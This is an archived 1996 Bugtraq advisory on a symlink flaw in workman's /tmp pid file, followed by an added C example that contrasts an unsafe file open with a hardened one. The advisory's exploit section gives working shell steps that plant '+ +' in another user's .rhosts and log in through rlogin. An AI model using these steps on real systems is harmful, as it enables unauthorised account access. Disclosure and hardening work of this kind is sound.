Bugtraq mailing list archives
r00t advisory -- workman vulnerability
From: gahull () ccs neu edu (Gregory Hull)
Date: Mon, 26 Aug 1996 12:21:15 -0400
r00t advisory
[ workman ]                                        [ Aug 25 1996 ]

-- Synopsis

There exists a vulnerability in workman that will allow any user to
create and write to files owned by the user who is running workman.
Workman creates a mode 666 file in /tmp and will gladly follow a
symbolic link to its target.

-- Exploitability

The exploit is absurdly simple:

    $ ln -s /home/target_user/.rhosts /tmp/.wm_pid
    # wait for target user to run workman
    $ echo "+ +" >/home/target_user/.rhosts
    $ rlogin -l localhost target_user

-- Fixes ?

The author of workman has been alerted to this problem and a patch is
available from ggal () ccs neu edu.

r00t -- http://www.r00t.org
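
The file-creation flaw described in the advisory above, shown next to a hardened form. This is an added example, not part of the original post and not workman's source or the patch it mentions. The function names are hypothetical, and the test setup uses a private temporary directory in place of /tmp/.wm_pid and a real home directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Model of the behaviour the advisory describes (assumed, not workman's
 * code): without O_EXCL, open() follows a symlink planted at `path`. */
static int write_pid_unsafe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0) return -1;
    dprintf(fd, "%ld\n", (long)getpid());
    return close(fd);
}

/* Hardened: O_CREAT|O_EXCL fails if anything, a symlink included, already
 * exists at `path`; O_NOFOLLOW and mode 0600 are defence in depth. */
static int write_pid_safe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    dprintf(fd, "%ld\n", (long)getpid());
    return close(fd);
}

/* Constructed setup: an empty "victim" file plus a symlink to it standing in
 * for the pid file. Returns the victim's size after the writer ran, or -1. */
static long victim_size_after(int use_safe, int *writer_rc) {
    char dir[] = "/tmp/pidlink-demo-XXXXXX", victim[64], lnk[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/.wm_pid", dir);
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || close(fd) || symlink(victim, lnk)) return -1;
    *writer_rc = use_safe ? write_pid_safe(lnk) : write_pid_unsafe(lnk);
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(lnk); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    int rc = 0;
    long sz = victim_size_after(0, &rc);
    printf("unsafe: rc=%d victim size=%ld\n", rc, sz);
    sz = victim_size_after(1, &rc);
    printf("safe:   rc=%d victim size=%ld\n", rc, sz);
    return 0;
}
```

A per-user runtime directory that other users cannot write to removes the shared-/tmp race altogether; the flags above cover the case where the file has to stay in a world-writable directory.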